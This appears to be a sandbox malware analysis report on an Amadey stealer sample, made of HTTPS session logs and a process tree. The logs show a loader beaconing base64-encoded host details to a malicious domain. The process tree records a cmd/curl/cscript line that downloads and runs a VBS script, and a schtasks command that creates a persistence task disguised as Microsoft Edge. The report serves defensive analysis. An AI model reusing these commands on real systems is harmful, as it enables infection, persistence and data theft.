2024-09-27 15:43:02 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
  Data Ascii: 2
2024-09-27 15:43:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49861 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:43:03 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
  Connection: Keep-Alive
  User-Agent: A WinHTTP Example Program/1.0
  Content-Length: 0
  Host: eijfrhegrtbrfcd.online
2024-09-27 15:43:03 UTC | 622 | IN | HTTP/1.1 200 OK
  Date: Fri, 27 Sep 2024 15:43:03 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  x-powered-by: PHP/8.0.30
  strict-transport-security: max-age=31536000;
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzfFWyldnP5FEjjBYpuk%2B4a%2FV1bhwJABHYf40etqUkt2HwPDqlNBL70BfOEgFF9lTEGGVEmNd6pbKbJW94UcJdVe%2FnPodcU7aobmzRn06mq4Fxr7fNl0TexYxrHofnJSuuNyDQ61eK0k"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c9c9b6edbf34316-EWR
2024-09-27 15:43:03 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
  Data Ascii: 2
2024-09-27 15:43:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID:70
Source IP:192.168.2.4
Source Port:49862
Destination IP:172.67.187.100
Destination Port:443
PID:7636
Process:C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe

Timestamp:2024-09-27 15:43:03 UTC, Bytes transferred:621, Direction:OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp:2024-09-27 15:43:03 UTC, Bytes transferred:620, Direction:IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:43:03 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nc6VSoEsGz0rdET6pCB0tRR480GIB8yj8Bh8KLuQCcIdkFAfvB6zm8sJ6ip5UnVlDILnjevKsleEuT9GE2soUyO1EiCk1YPWiYad9eMoHmcFE%2FVSFc3psbB55J0Y%2BA6nmQvXnFwS6NjF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b6fbde943c4-EWR

Timestamp:2024-09-27 15:43:03 UTC, Bytes transferred:7, Direction:IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp:2024-09-27 15:43:03 UTC, Bytes transferred:5, Direction:IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:71
Source IP:192.168.2.4
Source Port:49864
Destination IP:172.67.187.100
Destination Port:443
PID:1748
Process:C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp:2024-09-27 15:43:04 UTC, Bytes transferred:621, Direction:OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp:2024-09-27 15:43:05 UTC, Bytes transferred:624, Direction:IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:43:05 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FRLFxNHpcH8yWa3FyttQicVrwH4VBRujvlMh%2FP7dqgC4PwjvsOhTsYVP6GTatafSQoBwmEJf7wB3WY4Q7O1UZ0WkDWJMgYeOXITtOJTdGEs7UrjPD%2FjZ3%2BXhV8EqzTSJxkC6Ce23OWRL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b77ef3c436d-EWR

Timestamp:2024-09-27 15:43:05 UTC, Bytes transferred:7, Direction:IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp:2024-09-27 15:43:05 UTC, Bytes transferred:5, Direction:IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:72
Source IP:192.168.2.4
Source Port:49867
Destination IP:172.67.187.100
Destination Port:443
PID:1748
Process:C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp:2024-09-27 15:43:06 UTC, Bytes transferred:621, Direction:OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp:2024-09-27 15:43:06 UTC, Bytes transferred:654, Direction:IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:43:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lxJHbmvHj5%2F0%2BLWf2bzpwPthlqL8yuaqB%2FbFJJhZN2s7Xm31mZHhJcWmvkWbiJTYD7dBY7o2C5XyeqfVKsg0TZeY78gPbDpsaPZ%2BchBQkMKVlYmOddaIanmb2Do3bxLQYEzJYGgJljy6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b7f4d6619df-EWR
alt-svc: h3=":443"; ma=86400

Timestamp:2024-09-27 15:43:06 UTC, Bytes transferred:7, Direction:IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp:2024-09-27 15:43:06 UTC, Bytes transferred:5, Direction:IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:73
Source IP:192.168.2.4
Source Port:49869
Destination IP:172.67.187.100
Destination Port:443
PID:1748
Process:C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp:2024-09-27 15:43:07 UTC, Bytes transferred:621, Direction:OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp:2024-09-27 15:43:08 UTC, Bytes transferred:620, Direction:IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:43:07 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2jvnQOmQxH5XTAZZlEN%2BF7ckDkUcjXDIzUwcPGIsadXpoKZzOm6K9vOXXQniqsZaDJAYKCvJ5wgO%2BU8mXN7xEhINWBRcSu6VH4iKKRHazGrnm0yGQea6m8erRgxs3bqpXj9LCfv1rrDm"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b891fad0ce5-EWR

Timestamp:2024-09-27 15:43:08 UTC, Bytes transferred:7, Direction:IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp:2024-09-27 15:43:08 UTC, Bytes transferred:5, Direction:IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:74
Source IP:192.168.2.4
Source Port:49872
Destination IP:172.67.187.100
Destination Port:443
PID:1748
Process:C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Timestamp:2024-09-27 15:43:08 UTC, Bytes transferred:621, Direction:OUT
Data:
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

Timestamp:2024-09-27 15:43:09 UTC, Bytes transferred:652, Direction:IN
Data:
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:43:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5LKcGcWPzx71kOddX4nye746q25%2F3rzVEi4tTLkE74PaO5yJz8rFk0pgW%2B7kB5T0ydNEtyMM2o9lvuB2AtVC0k%2FjVllTDnX3CzbMjumFSnHaJJW90jEoJy9oYXgvy1Xvoi9cM1HdMWC9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9b90b992434b-EWR
alt-svc: h3=":443"; ma=86400

Timestamp:2024-09-27 15:43:09 UTC, Bytes transferred:7, Direction:IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

Timestamp:2024-09-27 15:43:09 UTC, Bytes transferred:5, Direction:IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



Target ID:0
Start time:11:41:02
Start date:27/09/2024
Path:C:\Users\user\Desktop\file.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\file.exe"
Imagebase:0x960000
File size:1'862'656 bytes
MD5 hash:DC730EEA0EBA910485703A74D173F8E2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1763005271.0000000000961000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1722139585.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID: 1
Start time: 11:41:04
Start date: 27/09/2024
Path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase: 0xc20000
File size: 1'862'656 bytes
MD5 hash: DC730EEA0EBA910485703A74D173F8E2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.1789584314.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 50%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 2
Start time: 11:41:04
Start date: 27/09/2024
Path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase: 0xc20000
File size: 1'862'656 bytes
MD5 hash: DC730EEA0EBA910485703A74D173F8E2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1749088265.0000000005340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1789363065.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 6
Start time: 11:42:00
Start date: 27/09/2024
Path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase: 0xc20000
File size: 1'862'656 bytes
MD5 hash: DC730EEA0EBA910485703A74D173F8E2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000003.2302324520.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 7
Start time: 11:42:03
Start date: 27/09/2024
Path: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
Imagebase: 0x400000
File size: 435'820 bytes
MD5 hash: 7DF3608AE8EA69762C71DA1C05F0C043
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 8
Start time: 11:42:05
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 11:42:05
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 11:42:05
Start date: 27/09/2024
Path: C:\Windows\System32\curl.exe
Wow64 process (32bit): false
Commandline: curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
Imagebase: 0x7ff646080000
File size: 530'944 bytes
MD5 hash: EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 11:42:06
Start date: 27/09/2024
Path: C:\Windows\System32\cscript.exe
Wow64 process (32bit): false
Commandline: cscript conf.vbs
Imagebase: 0x7ff7d3810000
File size: 161'280 bytes
MD5 hash: 24590BF74BBBBFD7D7AC070F4E3C44FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 12
Start time: 11:42:06
Start date: 27/09/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 11:42:06
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 11:42:07
Start date: 27/09/2024
Path: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Imagebase: 0x400000
File size: 435'820 bytes
MD5 hash: 7DF3608AE8EA69762C71DA1C05F0C043
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 15
Start time: 11:42:08
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                                Target ID:16
                                                                                                                                                                Start time:11:42:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:17
                                                                                                                                                                Start time:11:42:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:18
                                                                                                                                                                Start time:11:42:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:19
                                                                                                                                                                Start time:11:42:09
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:20
                                                                                                                                                                Start time:11:42:09
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:21
                                                                                                                                                                Start time:11:42:10
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:22
                                                                                                                                                                Start time:11:42:10
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:23
                                                                                                                                                                Start time:11:42:10
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:24
                                                                                                                                                                Start time:11:42:10
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:25
                                                                                                                                                                Start time:11:42:11
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:26
                                                                                                                                                                Start time:11:42:11
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
